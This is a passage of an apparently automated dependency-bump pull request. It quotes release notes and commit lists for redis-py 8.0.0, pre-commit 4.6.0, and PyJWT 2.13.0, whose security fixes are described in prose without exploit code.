(\u003ccode\u003ecore.py\u003c/code\u003e), \u003cstrong\u003eVectorSet commands\u003c/strong\u003e, and \u003cstrong\u003emodule commands\u003c/strong\u003e (Search, JSON, TimeSeries, Bloom filters) to provide distinct return types for sync and async clients. Previously, methods returned a combined \u003ccode\u003eResponseT\u003c/code\u003e (i.e., \u003ccode\u003eUnion[Awaitable[Any], Any]\u003c/code\u003e), which caused static analysis tools like mypy and Pyright to flag false positives. Now, sync clients see concrete return types (e.g., \u003ccode\u003eint\u003c/code\u003e, \u003ccode\u003ebool\u003c/code\u003e, \u003ccode\u003elist[str]\u003c/code\u003e) while async clients see \u003ccode\u003eAwaitable[...]\u003c/code\u003e wrappers. This is a \u003cstrong\u003ebreaking change for type-checking only\u003c/strong\u003e—runtime behavior is unchanged, but code relying on the old union return types in type annotations may need updates. Two new protocol types, \u003ccode\u003eSyncClientProtocol\u003c/code\u003e and \u003ccode\u003eAsyncClientProtocol\u003c/code\u003e, are used in overload signatures to enable this distinction.\u003c/p\u003e\n\u003ch3\u003eRESP3 by default with opt-in unified responses\u003c/h3\u003e\n\u003cp\u003eredis-py 8.0.0 now uses RESP3 on the wire by default while preserving legacy RESP2-compatible Python response shapes for existing applications (\u003ca href=\"https://redirect.github.com/redis/redis-py/issues/4052\"\u003e#4052\u003c/a\u003e). Protocol-independent unified response shapes are available by setting \u003ccode\u003elegacy_responses=False\u003c/code\u003e, so affected commands return the same Python structure with RESP2 or RESP3.\u003c/p\u003e\n\u003cp\u003eUse \u003ccode\u003eprotocol=2\u003c/code\u003e to force RESP2 on the wire, \u003ccode\u003eprotocol=3\u003c/code\u003e to opt into native RESP3 response shapes, or \u003ccode\u003elegacy_responses=False\u003c/code\u003e to migrate to unified responses. See \u003ca href=\"https://github.com/redis/redis-py/blob/HEAD/docs/unified_responses.rst\"\u003e\u003ccode\u003ehttps://github.com/redis/redis-py/blob/HEAD/docs/unified_responses.rst\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/redis/redis-py/blob/HEAD/specs/unified_responses_migration_guide.md\"\u003e\u003ccode\u003ehttps://github.com/redis/redis-py/blob/HEAD/specs/unified_responses_migration_guide.md\u003c/code\u003e\u003c/a\u003e for the affected commands and migration details.\u003c/p\u003e\n\u003ch3\u003eConnection and retry defaults\u003c/h3\u003e\n\u003cp\u003eDefault connection settings were updated: \u003ccode\u003esocket_timeout\u003c/code\u003e and \u003ccode\u003esocket_connect_timeout\u003c/code\u003e now default to 5 seconds, TCP keepalive is enabled by default, socket reads use a 32 KB buffer, connection pools default to \u003ccode\u003emax_connections=100\u003c/code\u003e, and retry defaults now use 10 attempts with exponential jitter backoff.\u003c/p\u003e\n\u003cp\u003eNote: \u003ccode\u003esocket_timeout\u003c/code\u003e can affect blocking commands such as \u003ccode\u003eBLPOP\u003c/code\u003e/\u003ccode\u003eBRPOP\u003c/code\u003e; if a command blocks longer than the client socket timeout, it may raise \u003ccode\u003eTimeoutError\u003c/code\u003e before the command timeout elapses (\u003ca href=\"https://redirect.github.com/redis/redis-py/issues/2807\"\u003e#2807\u003c/a\u003e).\u003c/p\u003e\n\u003ch2\u003e🧪 Experimental Features\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for new array commands (\u003ca href=\"https://redirect.github.com/redis/redis-py/issues/4055\"\u003e#4055\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🚀 New Features\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSupport Cluster PubSub in asyncio (\u003ca href=\"https://redirect.github.com/redis/redis-py/issues/3736\"\u003e#3736\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd Redis Keyspace Notifications Support for Redis Cluster (\u003ca href=\"https://redirect.github.com/redis/redis-py/issues/3962\"\u003e#3962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd random load balancing strategy which allows for use of the primary (\u003ca href=\"https://redirect.github.com/redis/redis-py/issues/4027\"\u003e#4027\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd FPHA (floating-point homogeneous array) arg support to JSON.SET (\u003ca href=\"https://redirect.github.com/redis/redis-py/issues/4011\"\u003e#4011\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdded custom Claude command + XNACK command support (\u003ca href=\"https://redirect.github.com/redis/redis-py/issues/4030\"\u003e#4030\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdding Time Series Multiple Aggregators support (\u003ca href=\"https://redirect.github.com/redis/redis-py/issues/4035\"\u003e#4035\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdding support for new COUNT aggregator for some sorted set commands - ZINTER, ZINTERSTORE, ZUNION, ZUNIONSTORE (\u003ca href=\"https://redirect.github.com/redis/redis-py/issues/4034\"\u003e#4034\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdding support for new INCREX command (\u003ca href=\"https://redirect.github.com/redis/redis-py/issues/4067\"\u003e#4067\u003c/a\u003e \u003ca href=\"https://redirect.github.com/redis/redis-py/issues/4077\"\u003e#4077\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd support for PubSub subscriptions with binary channel names and handlers (\u003ca href=\"https://redirect.github.com/redis/redis-py/issues/4068\"\u003e#4068\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/redis/redis-py/commit/733f80ec633d6a772a6e1ccb1c0cca6fc1afb4b6\"\u003e\u003ccode\u003e733f80e\u003c/code\u003e\u003c/a\u003e Updates in default connection and retry settings (\u003ca href=\"https://redirect.github.com/redis/redis-py/issues/4082\"\u003e#4082\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/redis/redis-py/commit/a68a16c296591e902d0c749d31781550048f280f\"\u003e\u003ccode\u003ea68a16c\u003c/code\u003e\u003c/a\u003e Updating Redis supported versions in README.md and lib version to 8.0.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/redis/redis-py/commit/43a41d3d2956aa69eb0041655067ffaaaf23c6c3\"\u003e\u003ccode\u003e43a41d3\u003c/code\u003e\u003c/a\u003e Updating INCREX command arg - SATURATE now controls overflow behaviour (\u003ca href=\"https://redirect.github.com/redis/redis-py/issues/4077\"\u003e#4077\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/redis/redis-py/commit/1496deba3801605cb123cb1b67adda50e85cd1e5\"\u003e\u003ccode\u003e1496deb\u003c/code\u003e\u003c/a\u003e Preserve explicit None for client metadata config (\u003ca href=\"https://redirect.github.com/redis/redis-py/issues/4081\"\u003e#4081\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/redis/redis-py/commit/57dc08c550f82086afeaa68a7cd7e5df356f7217\"\u003e\u003ccode\u003e57dc08c\u003c/code\u003e\u003c/a\u003e Avoid zero-timeout async reads in hiredis connections readiness checks and re...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/redis/redis-py/commit/cd54ddd25aa307dc7f05bc0e4387cfc294c0a4c8\"\u003e\u003ccode\u003ecd54ddd\u003c/code\u003e\u003c/a\u003e fix(typing): correct type annotation for XReadResponse (\u003ca href=\"https://redirect.github.com/redis/redis-py/issues/4046\"\u003e#4046\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/redis/redis-py/commit/ab2d41fcf0f9477ac788822d7c430004076a27f2\"\u003e\u003ccode\u003eab2d41f\u003c/code\u003e\u003c/a\u003e Add support for PubSub subscriptions with binary channel names and handlers (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/redis/redis-py/commit/ef24dc99b6f2aa9507f19aa4ce4be37745ed6c77\"\u003e\u003ccode\u003eef24dc9\u003c/code\u003e\u003c/a\u003e Randomize cluster startup node order during topology refresh (\u003ca href=\"https://redirect.github.com/redis/redis-py/issues/4060\"\u003e#4060\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/redis/redis-py/commit/b604015aeb5abce4b576f9dc54ffe30a3f1ba8c6\"\u003e\u003ccode\u003eb604015\u003c/code\u003e\u003c/a\u003e Add CLAUDE.md and /sync-claude-md skill for managing (\u003ca href=\"https://redirect.github.com/redis/redis-py/issues/4066\"\u003e#4066\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/redis/redis-py/commit/2b8b4fcc9986fbc1f188cc6a355d12eec814ee90\"\u003e\u003ccode\u003e2b8b4fc\u003c/code\u003e\u003c/a\u003e Fix flaky tests (\u003ca href=\"https://redirect.github.com/redis/redis-py/issues/4071\"\u003e#4071\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/redis/redis-py/compare/v7.3.0...v8.0.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pyjwt` from 2.12.1 to 2.13.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/releases\"\u003epyjwt's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.13.0\u003c/h2\u003e\n\u003ch1\u003ePyJWT 2.13.0 — Security Release\u003c/h1\u003e\n\u003cp\u003eThis release bundles five security fixes plus three additional hardening / spec-compliance changes. We recommend all users upgrade.\u003c/p\u003e\n\u003ch2\u003eSecurity\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\"\u003e\u003ccode\u003eGHSA-xgmm-8j9v-c9wx\u003c/code\u003e\u003c/a\u003e — JWK JSON accepted as HMAC secret (algorithm confusion).\u003c/strong\u003e \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e previously rejected PEM- and SSH-formatted asymmetric keys but did not catch a JWK passed as a raw JSON string. In a verifier configured with both symmetric and asymmetric algorithms in \u003ccode\u003ealgorithms=[…]\u003c/code\u003e and a raw-JSON JWK as the key, an attacker could forge HS256 tokens using the JWK text as the HMAC secret. The guard has been extended to reject any JWK-shaped JSON. \u003cem\u003eReported by \u003ca href=\"https://github.com/aradona91\"\u003e\u003ccode\u003e@​aradona91\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\"\u003e\u003ccode\u003eGHSA-jq35-7prp-9v3f\u003c/code\u003e\u003c/a\u003e — Algorithm allow-list bypass with \u003ccode\u003ePyJWK\u003c/code\u003e / \u003ccode\u003ePyJWKClient\u003c/code\u003e.\u003c/strong\u003e When verifying with a \u003ccode\u003ePyJWK\u003c/code\u003e, the caller's \u003ccode\u003ealgorithms=[…]\u003c/code\u003e allow-list was checked against the token header \u003ccode\u003ealg\u003c/code\u003e as a string only; actual verification used the algorithm bound to the \u003ccode\u003ePyJWK\u003c/code\u003e. An attacker who controlled a registered JWKS key could sign with one algorithm and advertise another on the header. PyJWT now requires the token header \u003ccode\u003ealg\u003c/code\u003e to match the \u003ccode\u003ePyJWK\u003c/code\u003e's algorithm before verification. \u003cem\u003eReported by \u003ca href=\"https://github.com/sushi-gif\"\u003e\u003ccode\u003e@​sushi-gif\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\"\u003e\u003ccode\u003eGHSA-w7vc-732c-9m39\u003c/code\u003e\u003c/a\u003e — DoS via base64 decode of unused payload segment when \u003ccode\u003eb64=false\u003c/code\u003e.\u003c/strong\u003e For detached-payload JWS (\u003ccode\u003eb64=false\u003c/code\u003e), the compact-form payload segment was base64-decoded before being discarded in favor of the caller-supplied \u003ccode\u003edetached_payload\u003c/code\u003e. An attacker could inflate the unused segment to force CPU + memory cost without holding a valid signature. The segment is now required to be empty per RFC 7515 Appendix F, and is no longer decoded. \u003cem\u003eReported by \u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\"\u003e\u003ccode\u003eGHSA-993g-76c3-p5m4\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e accepts non-HTTP(S) URIs.\u003c/strong\u003e \u003ccode\u003ePyJWKClient.fetch_data\u003c/code\u003e passed its URI to \u003ccode\u003eurllib.request.urlopen\u003c/code\u003e, which by default also handles \u003ccode\u003efile://\u003c/code\u003e, \u003ccode\u003eftp://\u003c/code\u003e, and \u003ccode\u003edata:\u003c/code\u003e schemes. An application that fed an attacker-influenced URI into \u003ccode\u003ePyJWKClient\u003c/code\u003e could be coerced into reading local files or reaching other unintended schemes. \u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects any URI whose scheme isn't \u003ccode\u003ehttp\u003c/code\u003e or \u003ccode\u003ehttps\u003c/code\u003e. \u003cem\u003eReported by \u003ca href=\"https://github.com/KEIJOT\"\u003e\u003ccode\u003e@​KEIJOT\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\"\u003e\u003ccode\u003eGHSA-fhv5-28vv-h8m8\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e cache wiped on fetch error.\u003c/strong\u003e A \u003ccode\u003efinally\u003c/code\u003e-block \u003ccode\u003eput(jwk_set=None)\u003c/code\u003e cleared the JWK Set cache whenever a fetch raised, turning a transient JWKS-endpoint outage into application-wide auth failure. The cache write was moved into the success path; transient errors no longer evict valid cached keys. \u003cem\u003eReported by \u003ca href=\"https://github.com/eddieran\"\u003e\u003ccode\u003e@​eddieran\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eFixed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReject empty HMAC keys outright in \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e with \u003ccode\u003eInvalidKeyError\u003c/code\u003e instead of accepting them with only a warning. Defends against the \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e footgun. \u003cem\u003eThanks to \u003ca href=\"https://github.com/SnailSploit\"\u003e\u003ccode\u003e@​SnailSploit\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/spartan8806\"\u003e\u003ccode\u003e@​spartan8806\u003c/code\u003e\u003c/a\u003e for the reports.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003eForward per-call \u003ccode\u003eoptions\u003c/code\u003e (including \u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e) from \u003ccode\u003ePyJWT.decode\u003c/code\u003e through to \u003ccode\u003ePyJWS._verify_signature\u003c/code\u003e. The option was previously silently dropped between the two layers, so it only took effect when set on the \u003ccode\u003ePyJWT\u003c/code\u003e instance. \u003cem\u003eThanks to \u003ca href=\"https://github.com/WLUB\"\u003e\u003ccode\u003e@​WLUB\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRFC 7797 §3 compliance for \u003ccode\u003eb64=false\u003c/code\u003e:\u003c/strong\u003e the encoder now auto-adds \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e to \u003ccode\u003ecrit\u003c/code\u003e, and the decoder rejects tokens that set \u003ccode\u003eb64=false\u003c/code\u003e without listing it in \u003ccode\u003ecrit\u003c/code\u003e. \u003cem\u003eThanks to \u003ca href=\"https://github.com/MachineLearning-Nerd\"\u003e\u003ccode\u003e@​MachineLearning-Nerd\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eChanged\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups, by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/1152\"\u003e#1152\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eUpgrade notes\u003c/h2\u003e\n\u003cp\u003eMost fixes are invisible to correctly-configured callers. A few behavioral changes you may encounter:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eEmpty HMAC keys now raise.\u003c/strong\u003e If your app passed \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e or \u003ccode\u003eb\u0026quot;\u0026quot;\u003c/code\u003e as a secret (often via a missing env var, e.g. \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e), \u003ccode\u003eencode\u003c/code\u003e/\u003ccode\u003edecode\u003c/code\u003e will now raise \u003ccode\u003eInvalidKeyError\u003c/code\u003e. This is the intended behavior — fix the configuration.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWK\u003c/code\u003e decoding now requires the token's \u003ccode\u003ealg\u003c/code\u003e to match the JWK's algorithm.\u003c/strong\u003e Previously a mismatch was silently honored if the header \u003ccode\u003ealg\u003c/code\u003e appeared in the allow-list. Tokens that relied on this mismatch will now fail with \u003ccode\u003eInvalidAlgorithmError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects non-HTTP(S) URIs at construction time.\u003c/strong\u003e Tests or dev environments that fetched JWKS from \u003ccode\u003efile://\u003c/code\u003e URIs need to switch to a local HTTP server or load the JWKS by other means (e.g. construct \u003ccode\u003ePyJWKSet.from_dict(...)\u003c/code\u003e directly).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eb64=false\u003c/code\u003e tokens are now strictly RFC 7515 / 7797 compliant.\u003c/strong\u003e Tokens with a non-empty compact-form payload segment, or that omit \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e from \u003ccode\u003ecrit\u003c/code\u003e, will be rejected. PyJWT-produced tokens always satisfy both invariants, so round-trips through PyJWT are unaffected.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e set per-call now takes effect.\u003c/strong\u003e Callers who passed \u003ccode\u003eoptions={\u0026quot;enforce_minimum_key_length\u0026quot;: True}\u003c/code\u003e to \u003ccode\u003ejwt.decode()\u003c/code\u003e previously got no enforcement; they will now get \u003ccode\u003eInvalidKeyError\u003c/code\u003e on undersized keys, as documented.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull changelog:\u003c/strong\u003e \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ehttps://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/blob/master/CHANGELOG.rst\"\u003epyjwt's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ccode\u003ev2.13.0 \u0026lt;https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u0026gt;\u003c/code\u003e__\u003c/h2\u003e\n\u003cp\u003eSecurity\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject JWK JSON documents passed as raw HMAC secrets in\n  ``HMACAlgorithm.prepare_key`` to close an algorithm-confusion gap that\n  the existing PEM/SSH guard did not cover. Reported by @aradona91 in\n  `GHSA-xgmm-8j9v-c9wx \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\u0026gt;`__.\n- Bind the JWT header ``alg`` to ``PyJWK.algorithm_name`` during\n  verification so the caller's ``algorithms=[...]`` allow-list cannot be\n  bypassed when decoding with a ``PyJWK`` / ``PyJWKClient`` key. Reported\n  by @sushi-gif in `GHSA-jq35-7prp-9v3f \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\u0026gt;`__.\n- Reject non-``http(s)`` URI schemes in ``PyJWKClient`` so attacker-\n  influenced URIs cannot read local files or reach unintended schemes via\n  urllib's default ``file://`` / ``ftp://`` / ``data:`` handlers. Reported\n  by @KEIJOT in `GHSA-993g-76c3-p5m4 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\u0026gt;`__.\n- Preserve the cached JWK Set on fetch errors in ``PyJWKClient.fetch_data``.\n  The previous ``finally``-block ``put(None)`` pattern cleared the cache\n  on any transient outage, turning one bad JWKS request into application-\n  wide auth failure. Reported by @eddieran in `GHSA-fhv5-28vv-h8m8 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\u0026gt;`__.\n- Skip the unconditional base64 decode of the compact-form payload segment\n  when ``b64=false`` is set in the protected header, and require that\n  segment to be empty (RFC 7515 Appendix F detached form). Closes an\n  unauthenticated DoS amplifier. Reported by @thesmartshadow in\n  `GHSA-w7vc-732c-9m39 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\u0026gt;`__.\n\u003cp\u003eFixed\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject empty HMAC keys outright in ``HMACAlgorithm.prepare_key`` with\n  ``InvalidKeyError`` instead of accepting them with only a warning.\n  Thanks to @SnailSploit and @spartan8806 for independently flagging the\n  footgun.\n- Forward per-call ``options`` (including ``enforce_minimum_key_length``)\n  from ``PyJWT.decode`` through to ``PyJWS._verify_signature`` so the\n  option actually takes effect when set at the call site rather than only\n  on the ``PyJWT`` instance. Thanks to @WLUB for the report.\n- RFC 7797 §3 compliance for ``b64=false``: the encoder now auto-adds\n  ``\u0026amp;quot;b64\u0026amp;quot;`` to the ``crit`` header parameter, and the decoder rejects\n  tokens that set ``b64=false`` without listing it in ``crit``. Thanks to\n  @MachineLearning-Nerd for the report.\n\nChanged\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ccode\u003e[#1152](https://github.com/jpadilla/pyjwt/issues/1152) \u0026amp;lt;https://github.com/jpadilla/pyjwt/pull/1152\u0026amp;gt;\u003c/code\u003e__\n\u003c/code\u003e\u003c/pre\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/7144e4534c34810f4525dc4578a32addd8212cff\"\u003e\u003ccode\u003e7144e45\u003c/code\u003e\u003c/a\u003e Apply ruff format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/d2f4bec4963897c0ef96ef64a875894f2c8542ab\"\u003e\u003ccode\u003ed2f4bec\u003c/code\u003e\u003c/a\u003e Restore \u003ccode\u003ecast()\u003c/code\u003e calls with cross-version \u003ccode\u003etype: ignore\u003c/code\u003e for \u003ccode\u003eprepare_key\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/22f478cebddd8294259c30f037ecb92b0b348774\"\u003e\u003ccode\u003e22f478c\u003c/code\u003e\u003c/a\u003e Remove redundant casts in \u003ccode\u003eRSAAlgorithm.prepare_key\u003c/code\u003e and `ECAlgorithm.prepare...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/95791b1759b8aa4f2203575d344d5c78564cdc81\"\u003e\u003ccode\u003e95791b1\u003c/code\u003e\u003c/a\u003e Bundle security fixes and hardening into 2.13.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/dcc27a9d3182a2349c30b160758785c6ce7a6508\"\u003e\u003ccode\u003edcc27a9\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1155\"\u003e#1155\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/9d08a9a1896845ed8eaf88e6f6ac61e5800c3e7a\"\u003e\u003ccode\u003e9d08a9a\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1146\"\u003e#1146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/b87c10014d4109f0214fea188d00faaaf8a80e64\"\u003e\u003ccode\u003eb87c100\u003c/code\u003e\u003c/a\u003e Bump codecov/codecov-action from 5 to 6 (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1154\"\u003e#1154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/40e3147eb5f790d8d041772e5fc00728a176c812\"\u003e\u003ccode\u003e40e3147\u003c/code\u003e\u003c/a\u003e Migrate development extras to dependency groups (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1152\"\u003e#1152\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pre-commit` from 4.5.1 to 4.6.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pre-commit/pre-commit/releases\"\u003epre-commit's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003epre-commit v4.6.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epre-commit hook-impl\u003c/code\u003e: allow \u003ccode\u003e--hook-dir\u003c/code\u003e to be missing to enable easier usage with \u003ccode\u003egit\u003c/code\u003e 2.54+ git hooks.\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/pre-commit/pre-commit/issues/3662\"\u003e#3662\u003c/a\u003e PR by \u003ca href=\"https://github.com/asottile\"\u003e\u003ccode\u003e@​asottile\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epre-commit hook-impl\u003c/code\u003e: \u003ccode\u003e--hook-type\u003c/code\u003e is required.\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/pre-commit/pre-commit/issues/3661\"\u003e#3661\u003c/a\u003e PR by \u003ca href=\"https://github.com/asottile\"\u003e\u003ccode\u003e@​asottile\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pre-commit/pre-commit/blob/main/CHANGELOG.md\"\u003epre-commit's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e4.6.0 - 